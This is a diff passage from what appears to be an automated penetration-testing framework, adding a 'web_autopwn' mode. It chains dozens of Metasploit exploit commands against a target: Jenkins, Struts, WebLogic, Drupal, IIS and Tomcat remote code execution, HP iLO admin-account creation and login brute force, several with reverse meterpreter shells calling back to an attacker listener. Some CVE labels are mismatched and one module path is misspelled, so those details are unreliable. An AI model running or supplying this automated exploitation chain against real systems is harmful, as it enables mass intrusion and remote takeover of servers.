[ "$VERBOSE" == "1" ]; then - echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 3 $RESET" + echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 2 $RESET" fi - blackwidow -u http://$TARGET:80 -l 3 -v n + blackwidow -u http://$TARGET:80 -l 2 -v n cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null @@ -256,6 +265,12 @@ if [ "$MODE" = "stealth" ]; then wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -263,7 +278,9 @@ if [ "$MODE" = "stealth" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING COMMENTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null + cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null + sed -r "s/ /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null + rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING SITE LINKS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -285,7 +302,7 @@ if [ "$MODE" = "stealth" ]; then if [ "$VERBOSE" == "1" ]; then echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET" fi - blackwidow -u https://$TARGET:443 -l 3 -v n + blackwidow -u https://$TARGET:443 -l 2 -v n cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null fi if [ $WEB_BRUTE_STEALTHSCAN == "1" ]; then @@ -347,6 +364,7 @@ if [ "$MODE" = "stealth" ]; then echo -e "" echo "$TARGET" >> $LOOT_DIR/scans/updated.txt rm -f $INSTALL_DIR/.fuse_* 2> /dev/null + sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null if [ "$LOOT" = "1" ]; then loot fi diff --git a/modes/web_autopwn.sh b/modes/web_autopwn.sh new file mode 100644 index 00000000..7464adae --- /dev/null +++ b/modes/web_autopwn.sh @@ -0,0 +1,174 @@ + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw + sed -r 